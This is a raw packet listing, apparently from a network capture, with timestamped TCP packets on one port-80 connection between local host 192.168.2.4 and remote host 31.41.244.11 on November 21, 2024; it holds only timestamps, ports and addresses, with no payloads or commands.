                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.896879911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.896981001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.897053003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.897368908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.897416115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.897429943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.897494078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.898452044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.898524046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.898550987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.898606062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.899528980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.899611950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.899655104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.899713039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.900567055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.900640965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.900691032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.900752068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.901674032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.901745081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.901788950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.901843071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.902780056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.902843952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.902851105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.902904987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.903911114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.904078007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.904110909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.904206038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.904917002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.904982090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.905006886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.905061960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.906009912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.906064987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.906107903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.906160116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.907113075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.907169104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.907265902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.907324076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.908210039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.908279896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.908302069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.908355951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.909295082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.909372091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.909404039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.909460068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.910413980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.910473108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.910475016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.910521984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.911504030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.911569118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.911569118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.911618948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.912554026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.912614107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.912661076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.912714958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.913626909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.913743973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.913763046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.913796902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.914719105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.915013075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.915091038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.915996075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.916012049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.916065931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.916109085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.916913986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.917140007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.917207956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.917995930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.918067932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.918080091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.918132067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.919083118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.919143915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.919156075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.919194937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.920185089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.920260906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.920291901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.920348883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.921258926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.921366930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.921462059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.922346115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.922411919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.922497988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.922554016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.923460960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.923610926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.923672915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.924525023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.924587965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.924664974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.924717903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.925611973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.925669909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.925750017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.925801039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.926729918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.926785946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.926836014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.926889896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931636095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931653023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931781054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931791067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931806087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931821108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931835890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931852102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931874037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931889057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931896925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.931946993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.932152033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.932185888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.932212114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.932244062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.933258057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.933310986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.933455944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.933511019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.934340000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.934389114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.934432983 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.934478998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.935437918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.935509920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.935528994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.935586929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.936500072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.936578035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.936703920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.936768055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.937608957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.937681913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.937711954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.937771082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.938683987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.938766003 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.938869953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.938920021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.939778090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.939846039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.939884901 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.939932108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.942213058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.943492889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.943574905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945061922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945077896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945094109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945108891 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945142984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945163965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945732117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945926905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.945979118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.947033882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.947050095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.947086096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.947124004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.948139906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.948298931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.948349953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.949285984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.949424982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.949481964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.950123072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.950171947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.950313091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.950360060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.951421022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.951437950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.951472044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.951492071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.952487946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.952661037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.952752113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.953521967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.953537941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.953603029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.954462051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.954483986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.954545021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.955641985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.955703974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.107856989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.107929945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.107932091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.107981920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.108015060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.108031034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.108063936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.108088970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.109153032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.109179974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.109225035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.109244108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.110151052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.110202074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.110265970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.110321999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.111324072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.111380100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.111474991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.111531019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.112350941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.112409115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.112557888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.112762928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.113549948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.113605976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.113620996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.113671064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.114535093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.114597082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.114636898 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.114684105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.115627050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.115693092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.115748882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.115797043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.116739035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.116785049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.116835117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.117784023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.117847919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.117887974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.117949009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.118880987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.118938923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.119019985 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.119101048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.120017052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.120130062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.120181084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.121061087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.121172905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.121205091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.121228933 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.122153997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.122210979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.122256994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.122303009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.123254061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.123332977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.123343945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.123393059 CET4977080192.168.2.431.41.244.11
